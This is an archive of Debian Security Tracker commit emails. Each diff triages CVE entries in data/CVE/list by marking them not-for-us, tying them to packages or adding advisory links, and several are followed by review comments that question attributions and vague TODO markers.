[Git][security-tracker-team/security-tracker][master] CVE-2024-29733/airflow

2024-04-19 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f9f2b30e by Henri Salo at 2024-04-19T13:30:54+03:00
CVE-2024-29733/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -6187,6 +6187,8 @@ CVE-2024-2322 (The WooCommerce Cart Abandonment Recovery 
WordPress plugin before
NOT-FOR-US: WordPress plugin
 CVE-2024-29734 (Uncontrolled search path element issue exists in SonicDICOM 
Media View ...)
NOT-FOR-US: SonicDICOM Media Viewer
+CVE-2024-29733
+   - airflow  (bug #819700)
 CVE-2024-29434 (An issue in the system image upload interface of Alldata 
v0.4.6 allows ...)
NOT-FOR-US: Alldata
 CVE-2024-29432 (Alldata v0.4.6 was discovered to contain a SQL injection 
vulnerability ...)
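Review bot: the added CVE-2024-29733 entry has no description and no NOTE, only the airflow line with bug #819700, so the attribution to airflow cannot be checked from the entry itself. Add a NOTE with the upstream advisory URL.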



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f9f2b30ed5f65fb6d6822345a78b8a11e18c2892

-- 
View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f9f2b30ed5f65fb6d6822345a78b8a11e18c2892
You're receiving this email because of your account on salsa.debian.org.


___
debian-security-tracker-commits mailing list
debian-security-tracker-commits@alioth-lists.debian.net
https://alioth-lists.debian.net/cgi-bin/mailman/listinfo/debian-security-tracker-commits


[Git][security-tracker-team/security-tracker][master] NFU

2024-04-19 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
68a78d8d by Henri Salo at 2024-04-19T13:10:42+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1942,6 +1942,8 @@ CVE-2024-29219 (Out-of-bounds read vulnerability exists 
in KV STUDIO Ver.11.64 a
NOT-FOR-US: KEYENCE KV STUDIO
 CVE-2024-29218 (Out-of-bounds write vulnerability exists in KV STUDIO 
Ver.11.64 and ea ...)
NOT-FOR-US: KEYENCE KV STUDIO
+CVE-2024-29217
+   NOT-FOR-US: Apache Answer
 CVE-2024-28957 (Generation of predictable identifiers issue exists in Cente 
middleware ...)
NOT-FOR-US: Cente
 CVE-2024-28894 (Out-of-bounds read vulnerability caused by improper checking 
of the op ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/68a78d8d7f1dae39c7df5cc3bd4714fc27bbd9ff



[Git][security-tracker-team/security-tracker][master] foswiki CVE-2023-33756, CVE-2023-24698

2023-08-07 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
13164030 by Henri Salo at 2023-08-07T15:38:09+03:00
foswiki CVE-2023-33756, CVE-2023-24698

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -7823,6 +7823,8 @@ CVE-2023-33960 (OpenProject is web-based project 
management software. For any Op
NOT-FOR-US: OpenProject
 CVE-2023-33764 (eMedia Consulting simpleRedak up to v2.47.23.05 was discovered 
to cont ...)
NOT-FOR-US: eMedia Consulting simpleRedak
+CVE-2023-33756
+   - foswiki  (bug #509864)
 CVE-2023-33754 (The captive portal in Inpiazza Cloud WiFi versions prior to 
v4.2.17 do ...)
NOT-FOR-US: Inpiazza Cloud WiFi
 CVE-2023-33552 (Heap Buffer Overflow in the erofs_read_one_data function at 
data.c in  ...)
@@ -30589,6 +30591,7 @@ CVE-2023-24699
RESERVED
 CVE-2023-24698
RESERVED
+   - foswiki  (bug #509864)
 CVE-2023-24697
RESERVED
 CVE-2023-24696
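Review bot: CVE-2023-24698 is still RESERVED where the foswiki line is added, and it reuses bug #509864, the same reference given to CVE-2023-33756 in the first hunk, so nothing in the entry shows why this id belongs to foswiki or how the two issues differ. Add a NOTE with the upstream announcement for each id.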



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/13164030f7338bdcbe9a8afa97eebe736a833cbe



[Git][security-tracker-team/security-tracker][master] NFU CVE-2023-36542

2023-07-29 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
aae19c90 by Henri Salo at 2023-07-29T10:58:22+03:00
NFU CVE-2023-36542

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2575,6 +2575,8 @@ CVE-2022-48521 (An issue was discovered in OpenDKIM 
through 2.10.3, and 2.11.x t
NOTE: https://github.com/trusteddomainproject/OpenDKIM/issues/148
 CVE-2023-36543 (Apache Airflow, versions before 2.6.3, has a vulnerability 
where an au ...)
- airflow  (bug #819700)
+CVE-2023-36542
+   NOT-FOR-US: Apache NiFi
 CVE-2023-35908 (Apache Airflow, versions before 2.6.3, is affected by a 
vulnerability  ...)
- airflow  (bug #819700)
 CVE-2023-3608 (A vulnerability was found in Ruijie BCR810W 2.5.10. It has been 
rated  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/aae19c902f0b14dce105828c1605257d42e5d1d9



[Git][security-tracker-team/security-tracker][master] NFU CVE-2023-38647

2023-07-25 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
edfb6a00 by Henri Salo at 2023-07-25T20:53:00+03:00
NFU CVE-2023-38647

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -214,6 +214,8 @@ CVE-2023-3819 (Exposure of Sensitive Information to an 
Unauthorized Actor in Git
NOT-FOR-US: pimcore
 CVE-2023-3102 (A sensitive information leak issue has been discovered in 
GitLab EE af ...)
- gitlab  (Specific to EE)
+CVE-2023-38647
+   NOT-FOR-US: Apache Helix
 CVE-2023-38646 (Metabase open source before 0.46.6.1 and Metabase Enterprise 
before 1. ...)
NOT-FOR-US: Metabase
 CVE-2023-38187 (Microsoft Edge (Chromium-based) Elevation of Privilege 
Vulnerability)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/edfb6a00925b8c18a55653454380eca9dac106e6



[Git][security-tracker-team/security-tracker][master] CVE-2023-34478/shiro

2023-07-24 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
eaffaf86 by Henri Salo at 2023-07-24T21:13:16+03:00
CVE-2023-34478/shiro

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -297,6 +297,10 @@ CVE-2023-36853 (In Keysight Geolocation Server v2.4.2 and 
prior, a low privilege
NOT-FOR-US: Keysight Geolocation Server
 CVE-2023-35134 (Weintek Weincloud v0.13.6   could allow an attacker to reset a 
passwor ...)
NOT-FOR-US: Weincloud
+CVE-2023-34478
+   - shiro 
+   NOTE: https://www.openwall.com/lists/oss-security/2023/07/24/4
+   TODO: check
 CVE-2023-34429 (Weintek Weincloud v0.13.6 could allow an attacker to cause 
a denia ...)
NOT-FOR-US: Weincloud
 CVE-2023-34394 (In Keysight Geolocation Server v2.4.2 and prior, an attacker 
could upl ...)
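Review bot: TODO: check on the added CVE-2023-34478 entry does not say what remains to be checked, and the only reference is the oss-security post. State the open item in the TODO text (affected versions, fixing commit) so it can be resolved without rereading the advisory.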



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/eaffaf86dd5f0068447bc1a3d55ee33ae6ec646d



[Git][security-tracker-team/security-tracker][master] NFU

2023-03-15 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
af8e549f by Henri Salo at 2023-03-15T13:11:59+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5806,7 +5806,7 @@ CVE-2023-26264
 CVE-2023-26263
RESERVED
 CVE-2023-26262 (An issue was discovered in Sitecore XP/XM 10.3. As an 
authenticated Si ...)
-   TODO: check
+   NOT-FOR-US: Sitecore
 CVE-2023-26261 (In UBIKA WAAP Gateway/Cloud through 6.10, a blind XPath 
injection lead ...)
NOT-FOR-US: UBIKA WAAP Gateway/Cloud
 CVE-2023-26260



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/af8e549f29cd79e0b8a7332dfbec232101c349a5



[Git][security-tracker-team/security-tracker][master] NFU

2023-02-23 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
c5de1b01 by Henri Salo at 2023-02-23T11:51:28+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2442,6 +2442,7 @@ CVE-2023-25622
RESERVED
 CVE-2023-25621
RESERVED
+   NOT-FOR-US: Apache Sling
 CVE-2023-25620
RESERVED
 CVE-2023-25619



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/c5de1b012cdb26294b09b19792a86c43f701fd45



[Git][security-tracker-team/security-tracker][master] CVE-2023-24580/python-django

2023-02-14 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
35d1ce86 by Henri Salo at 2023-02-14T11:03:45+02:00
CVE-2023-24580/python-django

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3229,6 +3229,9 @@ CVE-2023-0526
RESERVED
 CVE-2023-24580
RESERVED
+   - python-django 
+   TODO: check
+   NOTE: 
https://www.djangoproject.com/weblog/2023/feb/14/security-releases/
 CVE-2023-24579
RESERVED
 CVE-2023-24578
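Review bot: under CVE-2023-24580 the added lines put TODO: check before the NOTE while the entry is still RESERVED, so the NOTE is the only thing that justifies the python-django line. Place the NOTE directly after the package line and keep the TODO last, where it is easy to spot and remove.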



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/35d1ce8677baf886c11f3a452f6321a27131975d



[Git][security-tracker-team/security-tracker][master] NFU

2023-02-04 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
e3109616 by Henri Salo at 2023-02-04T11:07:20+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -6602,6 +6602,7 @@ CVE-2013-10009 (A vulnerability was found in DrAzraelTod 
pyChao and classified a
NOT-FOR-US: DrAzraelTod pyChao
 CVE-2023-22849
RESERVED
+   NOT-FOR-US: Apache Sling
 CVE-2023-0114 (A vulnerability was found in Netis Netcore Router. It has been 
rated a ...)
NOT-FOR-US: Netis Netcore Router
 CVE-2023-0113 (A vulnerability was found in Netis Netcore Router up to 2.2.6. 
It has  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/e310961624138610c9a7a3fc1aedf9bfcb99656d



[Git][security-tracker-team/security-tracker][master] CVE-2022-26068/pistache

2023-02-02 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7f8e69f4 by Henri Salo at 2023-02-03T05:48:54+02:00
CVE-2022-26068/pistache

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -74458,7 +74458,8 @@ CVE-2022-0759 (A flaw was found in all versions of 
kubeclient up to (but not inc
 CVE-2022-26085 (An OS command injection vulnerability exists in the httpd 
wlscan_ASP f ...)
NOT-FOR-US: InHand Networks InRouter302
 CVE-2022-26068 (This affects the package pistacheio/pistache before 
0.0.3.20220425. It ...)
-   - pistache  (bug #929593)
+   - pistache 
+   TODO: check
 CVE-2022-26066
RESERVED
 CVE-2022-26063
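Review bot: the removed line "- pistache  (bug #929593)" takes the bug reference out of CVE-2022-26068 and the replacement adds only TODO: check, with nothing in the commit subject saying why the reference was dropped. If #929593 was the wrong bug, say so in a NOTE; if it still applies, keep it on the package line.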



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7f8e69f4e07496dda9a4b4f12221517665ca5f13



[Git][security-tracker-team/security-tracker][master] NFU

2023-02-01 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
891c57d1 by Henri Salo at 2023-02-01T12:44:45+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,3 +1,6 @@
+CVE-2023-24997
+   RESERVED
+   NOT-FOR-US: Apache InLong
 CVE-2023-24977
RESERVED
NOT-FOR-US: Apache InLong
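Review bot: the new top entry CVE-2023-24997 differs from the context entry CVE-2023-24977 directly below it only by two transposed digits, and both carry NOT-FOR-US: Apache InLong; confirm that 24997 is a separately assigned id and not a mistyped 24977. The added block includes its own RESERVED line and no NOTE, so a link to the announcement would make that easy to verify.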



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/891c57d120814dc9d8113687413b010413a7aaee



[Git][security-tracker-team/security-tracker][master] NFU

2023-02-01 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
a13e905a by Henri Salo at 2023-02-01T10:13:41+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1,5 +1,6 @@
 CVE-2023-24977
RESERVED
+   NOT-FOR-US: Apache InLong
 CVE-2023-24976
RESERVED
 CVE-2023-24975



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/a13e905a632f8dda74b274c0d86fd5e868ea5d97



[Git][security-tracker-team/security-tracker][master] NFU

2023-01-05 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
52718548 by Henri Salo at 2023-01-06T09:38:17+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -9098,6 +9098,7 @@ CVE-2022-4146
RESERVED
 CVE-2022-45935
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-45934 (An issue was discovered in the Linux kernel through 6.0.10. 
l2cap_conf ...)
- linux 
NOTE: 
https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=ae4569813a6e931258db627cdfe50dfb4f917d5d
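Review bot: CVE-2022-45935 is still RESERVED where NOT-FOR-US: Apache James is added, and the commit subject is just "NFU", so neither the diff nor the log says where the Apache James attribution came from. Name the CVE ids in the subject, as in "NFU CVE-2023-36542", or add a NOTE with the announcement.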
@@ -9506,6 +9507,7 @@ CVE-2022-45788
RESERVED
 CVE-2022-45787
RESERVED
+   NOT-FOR-US: Apache James
 CVE-2022-45786
RESERVED
 CVE-2022-4121 [Null pointer dereference in mailimap_mailbox_data_status_free 
in low-level/imap/mailimap_types.c]



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/527185484998c90bf431880b9461961e177df804



[Git][security-tracker-team/security-tracker][master] NFU

2022-12-30 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
d02f76c4 by Henri Salo at 2022-12-30T13:18:57+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -13178,6 +13178,7 @@ CVE-2022-44622 (In JetBrains TeamCity version between 
2021.2 and 2022.10 access
NOT-FOR-US: JetBrains TeamCity
 CVE-2022-44621
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2022-44618
RESERVED
 CVE-2022-44614
@@ -18198,6 +18199,7 @@ CVE-2022-43397 (A vulnerability has been identified in 
Parasolid V34.0 (All vers
NOT-FOR-US: Siemens
 CVE-2022-43396
RESERVED
+   NOT-FOR-US: Apache Kylin (different from Kylin desktop environment)
 CVE-2022-3591 (Use After Free in GitHub repository vim/vim prior to 9.0.0789. 
...)
- vim 2:9.0.0813-1 (unimportant)
NOTE: https://huntr.dev/bounties/a5a998c2-4b07-47a7-91be-dbc1886b3921



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/d02f76c44a2f42e124d2f75fab4f76dcf3c56fe4



[Git][security-tracker-team/security-tracker][master] NFU

2022-12-02 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7b901fee by Henri Salo at 2022-12-03T08:12:15+02:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -912,7 +912,7 @@ CVE-2022-46146 (Prometheus Exporter Toolkit is a utility 
package to build export
NOTE: 
https://github.com/prometheus/exporter-toolkit/security/advisories/GHSA-7rg2-cxvp-9p7p
NOTE: 
https://github.com/prometheus/exporter-toolkit/commit/5b1eab34484ddd353986bce736cd119d863e4ff5
 (v0.8.2)
 CVE-2022-46145 (authentik is an open-source identity provider. Versions prior 
to 2022. ...)
-   TODO: check
+   NOT-FOR-US: authentik
 CVE-2022-46144
RESERVED
 CVE-2022-46143



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7b901fee2939a3109bbbe7576d559bf546ee9f6d



[Git][security-tracker-team/security-tracker][master] Fix typo

2022-10-27 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
3fbfc044 by Henri Salo at 2022-10-28T08:55:36+03:00
Fix typo

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1669,7 +1669,7 @@ CVE-2022-43761
RESERVED
 CVE-2022-3705 (A vulnerability was found in vim and classified as problematic. 
Affect ...)
- vim 
-   NOTE: 
ttps://github.com/vim/vim/commit/d0fab10ed2a86698937e3c3fed2f10bd9bb5e731 
(v9.0.0805)
+   NOTE: 
https://github.com/vim/vim/commit/d0fab10ed2a86698937e3c3fed2f10bd9bb5e731 
(v9.0.0805)
 CVE-2022-3704 (A vulnerability classified as problematic has been found in 
Ruby on Ra ...)
- rails 
NOTE: 
https://github.com/rails/rails/commit/be177e4566747b73ff63fd5f529fab564e475ed4



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/3fbfc0446da5a4517f6461a9e81fdde0bb13c59b



[Git][security-tracker-team/security-tracker][master] CVE-2022-41672/airflow

2022-10-04 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
15f2defb by Henri Salo at 2022-10-04T22:18:47+03:00
CVE-2022-41672/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1656,6 +1656,7 @@ CVE-2022-41673
RESERVED
 CVE-2022-41672
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-41671
RESERVED
 CVE-2022-41670



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/15f2defbde0e35afb32d3aadb156b597e23a5247



[Git][security-tracker-team/security-tracker][master] CVE-2022-41317 and CVE-2022-41318 squid

2022-09-23 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
89090afc by Henri Salo at 2022-09-23T09:37:32+03:00
CVE-2022-41317 and CVE-2022-41318 squid

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,6 +20,16 @@ CVE-2022-3267 (Cross-Site Request Forgery (CSRF) in GitHub 
repository ikus060/rd
- rdiffweb  (bug #969974)
 CVE-2022-3266
RESERVED
+CVE-2022-41318
+   - squid 
+   - squid3 
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/09/23/2
+CVE-2022-41317
+   - squid 
+   - squid3 
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/09/23/1
 CVE-2022-41313
RESERVED
 CVE-2022-41312
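Review bot: both added entries list squid and squid3 and then TODO: check, without saying what the check is for, so it is unclear whether squid3 is listed because it is known to be affected or as a placeholder. Spell the open question out in the TODO (for example which source package versions the oss-security posts cover) so the next triager can close it.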



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/89090afc119770a3b381a30dace75588b8b09f47



[Git][security-tracker-team/security-tracker][master] NFU

2022-09-11 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
398135e8 by Henri Salo at 2022-09-11T12:21:13+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -2605,6 +2605,7 @@ CVE-2022-39136
RESERVED
 CVE-2022-39135
RESERVED
+   NOT-FOR-US: Apache Calcite
 CVE-2022-39134
RESERVED
 CVE-2022-39133



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/398135e89207ea51a4d372d9d8e4bfa0ab6cfbc4



[Git][security-tracker-team/security-tracker][master] CVE-2022-38054/airflow

2022-09-02 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
7581d34c by Henri Salo at 2022-09-02T09:49:19+03:00
CVE-2022-38054/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -3176,6 +3176,7 @@ CVE-2022-38058
RESERVED
 CVE-2022-38054
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-37412
RESERVED
 CVE-2022-37411



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/7581d34cd072905a6c43584dd3c51fc13c3efb6c



[Git][security-tracker-team/security-tracker][master] NFU CVE-2022-34916 Apache Flume

2022-08-20 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
5964ae24 by Henri Salo at 2022-08-21T02:24:21+03:00
NFU CVE-2022-34916 Apache Flume

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -8978,6 +8978,7 @@ CVE-2022-34917
RESERVED
 CVE-2022-34916
RESERVED
+   NOT-FOR-US: Apache Flume
 CVE-2022-2306 (Old session tokens can be used to authenticate to the 
application and  ...)
NOT-FOR-US: Nakama
 CVE-2022-2305 (The WordPress Popup WordPress plugin through 1.9.3.8 does not 
sanitise ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/5964ae24ae828da23329a544a0ef9e8b91ed0d21



[Git][security-tracker-team/security-tracker][master] CVE-2022-38362/airflow

2022-08-16 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8f89a0e0 by Henri Salo at 2022-08-16T22:09:06+03:00
CVE-2022-38362/airflow

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -20,6 +20,7 @@ CVE-2022-2826
RESERVED
 CVE-2022-38362
RESERVED
+   - airflow  (bug #819700)
 CVE-2022-38361
RESERVED
 CVE-2022-38360



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8f89a0e0a31dc86dcf461818b81ecf92557c88b2



[Git][security-tracker-team/security-tracker][master] NFU

2022-08-13 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
8e48f103 by Henri Salo at 2022-08-13T09:38:37+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1844,8 +1844,10 @@ CVE-2022-37413
RESERVED
 CVE-2022-37401
RESERVED
+   NOT-FOR-US: Apache OpenOffice
 CVE-2022-37400
RESERVED
+   NOT-FOR-US: Apache OpenOffice
 CVE-2022-37399
RESERVED
 CVE-2022-37398 (A stack-based buffer overflow vulnerability was found inside 
ADM when  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/8e48f103b2190b87d8482b5018141085aa9cdd55



[Git][security-tracker-team/security-tracker][master] NFU

2022-07-28 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
f09c6b2d by Henri Salo at 2022-07-28T11:19:18+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -1428,6 +1428,7 @@ CVE-2022-36367
RESERVED
 CVE-2022-36364
RESERVED
+   NOT-FOR-US: Apache Calcite
 CVE-2022-36298
RESERVED
 CVE-2022-35729



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/f09c6b2d2389f48da039eeb1ac01f27d17a54c88



[Git][security-tracker-team/security-tracker][master] NFU

2022-07-09 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6f9496a0 by Henri Salo at 2022-07-09T11:05:51+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -80955,7 +80955,7 @@ CVE-2021-31647
 CVE-2021-31646 (Gestsup before 3.2.10 allows account takeover through the 
password rec ...)
NOT-FOR-US: Gestsup
 CVE-2021-31645 (An issue was discovered in glFTPd 2.11a that allows remote 
attackers t ...)
-   TODO: check
+   NOT-FOR-US: glFTPd
 CVE-2021-31644
RESERVED
 CVE-2021-31643 (An XSS vulnerability exists in several IoT devices from CHIYU 
Technolo ...)
@@ -579384,7 +579384,7 @@ CVE-2005-0485 (Cross-site scripting (XSS) 
vulnerability in comment.php for paNew
 CVE-2005-0484 (Format string vulnerability in gprostats for GProFTPD before 
8.1.9 may ...)
NOT-FOR-US: GProFTPD
 CVE-2005-0483 (Multiple directory traversal vulnerabilities in sitenfo.sh, 
sitezipchk ...)
-   NOT-FOR-US: Glftpd
+   NOT-FOR-US: glFTPd
 CVE-2005-0482 (TrackerCam 5.12 and earlier allows remote attackers to cause a 
denial  ...)
NOT-FOR-US: TrackerCam
 CVE-2005-0481 (TrackerCam 5.12 and earlier allows remote attackers to read log 
files  ...)



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6f9496a0ee9f6535e56bed83d4c675ab7174ca3c



[Git][security-tracker-team/security-tracker][master] NFU

2022-07-09 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
935d9b4e by Henri Salo at 2022-07-09T11:01:09+03:00
NFU

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -405940,9 +405940,9 @@ CVE-2015-1786 (Cross-site request forgery (CSRF) 
vulnerability in Zend/Validator
- zendframework  (the vulnerability was introduced 
specifically in the 2.3 series)
NOTE: http://framework.zend.com/security/advisory/ZF2015-03
 CVE-2015-1785 (In nextgen-galery wordpress plugin before 2.0.77.3 there are 
two vulne ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin nextgen-galery
 CVE-2015-1784 (In nextgen-galery wordpress plugin before 2.0.77.3 there are 
two vulne ...)
-   TODO: check
+   NOT-FOR-US: WordPress plugin nextgen-galery
 CVE-2015-1783 (The prefix variable in the get_or_define_ns function in Lasso 
before c ...)
- lasso 2.4.1-1
[wheezy] - lasso  (Vulnerable code introduced later)
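
Review bot: the two added NOT-FOR-US lines for CVE-2015-1785 and CVE-2015-1784 copy the spelling "nextgen-galery" from the truncated CVE description. If that is a misspelling of the plugin's name, write the tag with the correct name so that a search of the list for the plugin finds both entries; the description line itself can stay as it is.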



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/935d9b4e2f0e6de0849966f0be24e710d4091621



[Git][security-tracker-team/security-tracker][master] CVE-2022-25167

2022-06-14 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
6d9ac5fd by Henri Salo at 2022-06-14T12:10:09+03:00
CVE-2022-25167

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -22459,8 +22459,10 @@ CVE-2022-25169 (The BPG parser in versions of Apache 
Tika before 1.28.2 and 2.4.
NOTE: https://www.openwall.com/lists/oss-security/2022/05/16/4
 CVE-2022-25168
RESERVED
-CVE-2022-25167
+CVE-2022-25167 [Apache Flume JMSSource does not protect from malicious JNDI 
urls]
RESERVED
+   TODO: check
+   NOTE: https://www.openwall.com/lists/oss-security/2022/06/14/1
 CVE-2022-24435 (Cross-site scripting vulnerability in phpUploader v1.2 and 
earlier all ...)
NOT-FOR-US: phpUploader
 CVE-2022-23986 (SQL injection vulnerability in the phpUploader v1.2 and 
earlier allows ...)
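
Review bot: the bracketed description added to CVE-2022-25167 already names Apache Flume, yet the entry is left at "TODO: check". If the affected software is known not to be packaged, resolve the entry in this commit with a NOT-FOR-US line in the form the neighbouring entries use; if the question is still open, say in the TODO what remains to be checked, since the NOTE link already gives the reference.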



View it on GitLab: 
https://salsa.debian.org/security-tracker-team/security-tracker/-/commit/6d9ac5fddca8a4cf72f076d597e186618c59c507



[Git][security-tracker-team/security-tracker][master] CVE-2022-27774, CVE-2022-27775, CVE-2022-27776

2022-04-27 Thread Henri Salo (@hsalo-guest)


Henri Salo pushed to branch master at Debian Security Tracker / security-tracker


Commits:
9f681b89 by Henri Salo at 2022-04-27T09:55:35+03:00
CVE-2022-27774, CVE-2022-27775, CVE-2022-27776

- - - - -


1 changed file:

- data/CVE/list


Changes:

=
data/CVE/list
=
@@ -5578,12 +5578,21 @@ CVE-2022-27778
RESERVED
 CVE-2022-2
RESERVED
-CVE-2022-27776
+CVE-2022-27776 [Auth/cookie leak on redirect]
RESERVED
-CVE-2022-27775
+   - curl 
+   NOTE: https://curl.se/docs/CVE-2022-27776.html
+   TODO: check
+CVE-2022-27775 [Bad local IPv6 connection reuse]
RESERVED
-CVE-2022-27774
+   - curl 
+   NOTE: https://curl.se/docs/CVE-2022-27775.html
+   TODO: check
+CVE-2022-27774 [Credential leak on redirect]
RESERVED
+   - curl 
